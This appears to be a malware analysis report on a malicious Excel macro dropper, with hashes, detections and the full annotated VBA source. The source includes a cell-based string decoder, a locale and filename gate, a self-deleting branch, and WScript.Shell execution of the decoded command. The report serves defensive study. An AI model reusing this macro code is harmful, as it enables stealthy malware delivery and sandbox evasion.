Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 41fd97847968ea52…

MALICIOUS

Office (OLE)

79.5 KB | Created: 2020-03-23 07:35:22 | Authoring application: Microsoft Excel | First seen: 2021-02-18
MD5: 8f82e982fe759b181611f3d47a182f09
SHA-1: 158376a9910d159daccb23b52929035903cccafb
SHA-256: 41fd97847968ea5227443b6f9137866d4fff02f4a9f935c3de8e995be63bcf96
220 Risk Score

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-7640675-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7640675-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Debug.Print CreateObject("WScript.Shell").Exec(comm(495)).StdOut.read(0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Debug.Print CreateObject("WScript.Shell").Exec(comm(495)).StdOut.read(0)
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2513 bytes
SHA-256: 3f95d48d4c8e9d0d99354cfa3513ee971be6e8816f1205d354692f6ec2456c99
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Multi, 1, 0, MSForms, MultiPage"
Attribute VB_Control = "falsse, 2, 1, MSForms, CommandButton"
' Analyst note: Layout event handler for the MSForms MultiPage control "Multi"
' that the VB_Control attribute above places on sheet Foglio1. It is one of two
' entry points into eco (the other is falsse_Click).
' The trigger is a control event, not Workbook_Open/Auto_Open, so triage that
' only searches for the usual auto-exec procedure names will not flag it.
' NOTE(review): confirm in a sandbox when Layout fires during workbook load.
Private Sub Multi_Layout(ByVal Index As Long)
' muii is assigned here and never read in the extracted source (appears to be filler).
muii = 0: eco
End Sub

' Analyst note: environment gate that selects between payload execution and
' self-deletion.
'   Condition 1: cell A1 formatted as "mmmm dd" (full month name + day) must
'                contain "rzo". Month names are locale dependent; "rzo" would
'                match e.g. "marzo", and the module names in this sample
'                (Questa_cartella_di_lavoro, Foglio1) are Italian, so this looks
'                like a locale check. TODO confirm against the value of A1.
'   Condition 2: the workbook file name must contain a lowercase "r"
'                (InStr returns a non-zero position; default compare is binary).
' Both true  -> mifrations (runs the decoded command).
' Otherwise  -> emi (the workbook deletes itself from disk).
' Triage impact: a sample stored under its hex hash with an .xls extension has
' no "r" in its name, so automated detonation is likely to observe only the
' self-delete branch. Verify the file name and locale used by the sandbox.
Sub eco()
If InStr(Format(Cells(1, 1), "mmmm dd"), "rzo") > 0 And InStr(ThisWorkbook.Name, "r") Then mifrations Else emi
End Sub
' Analyst note: failure branch of the gate in eco. Suppresses Excel's alert
' dialogs and then calls remm, so the self-deletion runs without a prompt.
Sub emi()
' Turn off confirmation/alert dialogs for what follows.
Application.DisplayAlerts = False:
remm
End Sub

' Analyst note: anti-forensics routine. Deletes the workbook file from disk
' and closes it without saving.
' Response impact: on a host where the gate in eco failed, the original
' document will no longer be at its saved path. Recover it from the delivery
' channel (mail gateway, download cache, quarantine) instead.
Sub remm()
Dim xFullName As String
' Full path of the workbook that is currently active.
xFullName = Application.ActiveWorkbook.FullName
' Mark the workbook as saved so that closing it raises no "save changes" prompt.
ActiveWorkbook.Saved = True
' Switch the open workbook to read-only. Presumably this releases Excel's write
' lock on the file so that the Kill below can succeed. TODO confirm.
Application.ActiveWorkbook.ChangeFileAccess xlReadOnly
' Delete the workbook file from disk.
Kill xFullName
' Close the workbook, discarding changes.
Application.ActiveWorkbook.Close False
End Sub

' Analyst note: rebuilds the command string that mifrations executes. The
' encoded data is stored in worksheet cells, not in the VBA source, so
' macros.bas alone does not reveal the command. The cell values in rows 20 and
' below of columns A and B are needed to recover it.
'
' j: last row of column A to read (the only visible caller passes 495).
' Returns: decoded column-A part followed by the decoded column-B part.
Function comm(j As Integer)
' Only "a" is typed As String here; "m" is an implicit Variant.
Dim m, a As String
a = ""
' Part 1: the outer loop runs once (p = 1, i.e. column A). Cells A20..A<j> are
' concatenated into one string and decoded by a single call to formulas.
For p = 1 To 1
m = ""
For o = 20 To j
m = m + Cells(o, p)
Next o
a = a + formulas(m)
Next p
' Part 2: cells B20..B43 are each decoded on their own and appended in row order.
m = ""
For x = 20 To 43
m = m + formulas(Cells(x, 2))
Next x
comm = a & m
End Function

' Analyst note: execution sink, and the line matched by the OLE_VBA_WSCRIPT and
' OLE_VBA_CREATEOBJ heuristics. The string returned by comm(495) is started as
' a process through WScript.Shell.Exec.
' StdOut.read(0) requests zero characters and Debug.Print writes only to the
' VBA Immediate window, so the wrapper produces nothing visible. Presumably it
' is there to make the call look like leftover debugging code.
' Detection: process-creation telemetry showing Excel as parent of a new child
' process is the host-side signal for this step.
Sub mifrations()
Debug.Print CreateObject("WScript.Shell").Exec(comm(495)).StdOut.read(0)
End Sub

' Analyst note: string decoder used by comm. The input is a digit string made
' of fixed-width records followed by one trailing control digit. Each record
' holds an output position and a 3-digit value. Records may appear in any
' order, and each value carries a position-dependent offset.
'
' ou: encoded digit string (ByVal, so the caller's copy is not modified).
' Returns: the decoded text, one character per record.
Function formulas(ByVal ou As String) As String

Dim waw As Integer

Dim Zm As Integer
Dim digi As Integer
Dim ami() As Integer
Dim lop() As Long
Dim iko As Integer

    ' Record width: 5 when the trailing digit is even, otherwise 4.
    ' Relies on VBA's implicit string-to-number conversion of Right(ou, 1).
    iko = IIf(Right(ou, 1) Mod 2 = 0, 5, 4)
    ' Strip the trailing control digit. Both IIf branches yield 1, so exactly
    ' one character is always removed.
    ou = Left(ou, Len(ou) - IIf(Right(ou, 1) Mod 2 = 0, 1, 1))
    ' Highest record index (record count minus one).
    waw = Len(ou) / iko - 1
    ReDim ami(waw)
    ReDim lop(waw)

    Zm = 0
    digi = 0

    ' Per-position offset table: ami(k) = k - recordCount, always negative.
    For digi = 0 To waw

        ami(digi) = digi - (waw + 1)
    Next digi


    ' For each output position Zm, scan the records for the one whose index
    ' field equals Zm. The index field is the first (iko - 3) characters of the
    ' record: two digits for width 5, one digit for width 4.
    For Zm = 0 To waw
        For digi = 0 To waw
            If CInt(Mid(ou, digi * iko + 1, iko - 3)) = Zm Then
                ' Value field = last 3 characters of the record. Adding the
                ' negative offset ami(Zm) gives the character code.
                lop(Zm) = (Mid(ou, (digi + 1) * iko - 2, 3) + ami(Zm))
                Exit For
            End If
        Next digi
    Next Zm

    ' Emit the character codes in position order.
    formulas = ""
    For Zm = 0 To waw
        formulas = formulas & Chr(lop(Zm))
    Next Zm

End Function



' Analyst note: Click handler for the MSForms CommandButton "falsse" that the
' VB_Control attribute places on sheet Foglio1. It is the second entry point
' into eco and requires the user to click the button.
Private Sub falsse_Click()
' mir is assigned here and never read in the extracted source (appears to be filler).
mir = 209
eco
End Sub